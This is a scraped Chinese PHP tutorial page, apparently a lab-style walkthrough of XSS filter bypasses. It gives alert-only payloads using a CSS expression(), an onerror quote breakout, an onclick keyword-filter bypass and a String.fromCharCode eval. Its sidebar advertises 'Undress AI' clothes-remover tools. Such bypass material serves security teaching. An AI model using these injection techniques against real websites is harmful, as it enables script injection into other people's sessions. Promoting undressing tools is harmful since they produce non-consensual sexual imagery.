xss的小測試是怎麼進行的-安全-PHP中文網

首頁

運維

安全

xss的小測試是怎麼進行的

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

May 19, 2023 am 11:37 AM

xss

無安全性方面的限制，直接使用

#限制條件：只能使用CSS，不允許使用html標籤

我們知道利用expression可以用來建構XSS，但只能在IE下面測試，所以下面的測試請在IE6中執行。

body {
black;
xss:alert(/xss/));/*IE6下测试*/
}

登入後複製

限制條件：對HTML進行了轉義，Image標籤可用。

測試輸入的字元會被插入到src位址中，那麼可以使用偽協定來繞過。

直接輸入

alert( /xss/);

登入後複製

或你也可以使用事件來繞過，注意閉合語句即可，如下：

1" onerror=alert(/xss/); var a="1

限制：使用了關鍵字過濾。

我測試了一下，大部分都過濾了，有部分未過濾，經過測試script/onerror過濾了，但是onclick未過濾，使用onclick事件繞過

<img src=# onclick=alert(/xss/);>

登入後複製

限制條件：使用addslashes對特徵字元進行了轉義

也就是說我們的XSS語句中不能出現單引號，雙引號等等特徵字元。

直接使用

<script>alert(/xss/);</script>

登入後複製

即可繞過

或使用String.fromCharCode方法，如下：

<script>eval(String.fromCharCode(97,108,101,114,116,40,47,120,47,41,59));</script>

登入後複製

以上是xss的小測試是怎麼進行的的詳細內容。更多資訊請關注PHP中文網其他相關文章！

本網站聲明

本文內容由網友自願投稿，版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容，請聯絡admin@php.cn

熱AI工具

熱工具

熱門話題

gmail信箱登陸入口在哪裡

7899

Java教學

1651

CakePHP 教程

1411

Laravel 教程

1303

PHP教程

1248

Related knowledge

Laravel中的跨站腳本攻擊（XSS）和跨站請求偽造（CSRF）防護 Aug 13, 2023 pm 04:43 PM

Laravel中的跨站腳本攻擊（XSS）和跨站請求偽造（CSRF）防護隨著互聯網的發展，網路安全問題也變得越來越嚴峻。其中，跨站腳本攻擊（Cross-SiteScripting，XSS）和跨站請求偽造（Cross-SiteRequestForgery，CSRF）是最常見的攻擊手段之一。 Laravel作為一款受歡迎的PHP開發框架，為使用者提供了多種安全機

PHP防禦XSS與遠端程式碼執行攻擊的方法 Jun 30, 2023 am 08:04 AM

如何使用PHP防禦跨站腳本（XSS）與遠端程式碼執行攻擊引言：在當今網路世界中，安全性成為了一個至關重要的問題。 XSS（跨站腳本攻擊）和遠端程式碼執行攻擊是兩種最常見的安全漏洞之一。本文將探討如何使用PHP語言來防禦這兩種攻擊，並提供幾種方法和技巧來保護網站免受這些攻擊的威脅。一、了解XSS攻擊XSS攻擊是指攻擊者透過在網站上註入惡意腳本來獲取使用者的個人資訊、

PHP和Vue.js開發安全性最佳實務：防止XSS攻擊 Jul 06, 2023 pm 01:37 PM

PHP和Vue.js開發安全性最佳實務：防止XSS攻擊隨著網路的快速發展，網路安全問題變得越來越重要。其中，XSS（跨站腳本攻擊）是一種非常常見的網路攻擊類型，旨在利用網站的安全漏洞，向使用者註入惡意程式碼或篡改網頁內容。在PHP和Vue.js開發中，採取一些安全性最佳實踐是非常重要的，以防止XSS攻擊。本文將介紹一些常用的防止XSS攻擊的方法，並提供對應的代

怎麼分析反射型XSS May 13, 2023 pm 08:13 PM

1.反射型XSS反射型XSS是指應用程式透過Web請求取得不可信賴的數據，在未檢驗資料是否有惡意程式碼的情況下，便將其傳送給了Web使用者。反射型XSS一般由攻擊者建構帶有惡意程式碼參數的URL，當URL位址被開啟時，特有的惡意程式碼參數被HTML解析、執行，它的特點是非持久化，必須使用者點擊帶有特定參數的鏈接才能引起。小編以JAVA語言原始碼為例，分析CWEID80:ImproperNeutralizationofScript-RelatedHTMLTagsinaWebPage(BasicXSS)2、

如何分析反射型XSS Jun 03, 2023 pm 12:09 PM

1測試環境介紹測試環境為OWASP環境中的DVWA模組2測試說明XSS又叫CSS(CrossSiteScript)，跨站腳本攻擊。它指的是惡意攻擊者往Web頁面插入惡意html程式碼，當使用者瀏覽該頁之時，嵌入其中Web裡面的html程式碼會被執行，從而達到惡意攻擊使用者的特殊目的，例如取得使用者的cookie，導航到惡意網站，攜帶攻擊等等。利用該漏洞，攻擊者可以劫持已通過驗證的使用者的會話。劫持到已驗證的會話後，病毒發起者擁有該授權使用者的所有權限。 3測試步驟在輸入框中輸入javascrip腳本程式碼：al

PHP中的安全性XSS過濾技術解析 Jun 29, 2023 am 09:49 AM

PHP是一種廣泛應用於網站開發的程式語言，但在使用PHP開發網站時，安全問題常常引起人們的擔憂。其中之一就是跨網站腳本攻擊（Cross-SiteScripting,XSS），是常見的網路安全漏洞。為了解決這個問題，PHP提供了一些安全XSS過濾技術。本文將介紹PHP中的安全XSS過濾技術的原理與使用方法。首先，我們要了解什麼是XSS攻擊。 XSS攻擊

PHP中的XSS攻擊 May 23, 2023 am 09:10 AM

近年來，隨著網路資訊科技的快速發展，我們的生活越來越離不開網路。而網路與我們日常生活的交互，離不開大量的程式碼編寫、傳輸以及處理。而這些程式碼，需要我們保護它們安全，否則，惡意攻擊者會利用它們發動各種攻擊。其中的一種攻擊就是XSS攻擊。在本文中，我們將重點放在PHP中的XSS攻擊，並且給予對應的防禦方法。一、XSS攻擊概述XSS攻擊，也稱為跨站腳本攻擊，通常是

PHP入門指南：跨站腳本攻擊（XSS） May 21, 2023 am 10:51 AM

PHP是一種流行的伺服器端程式語言，用於開發動態網頁和Web應用程式。然而，由於其廣泛的使用和易於學習的特性，它經常成為駭客入侵網站的攻擊目標。本文將介紹跨站腳本攻擊（XSS），並提供一些防範措施。什麼是跨站腳本攻擊？跨站腳本攻擊（XSS）是一種利用Web應用程式存在的漏洞的攻擊方式。攻擊者透過注入惡意程式碼來控制網站，然後向使用者發送欺騙性的連結或將惡意程式碼插

See all articles

xss的小測試是怎麼進行的

熱AI工具

Undresser.AI Undress

AI Clothes Remover

Undress AI Tool

Clothoff.io

Video Face Swap

熱門文章

熱工具

記事本++7.3.1

SublimeText3漢化版

禪工作室 13.0.1

Dreamweaver CS6

SublimeText3 Mac版

熱門話題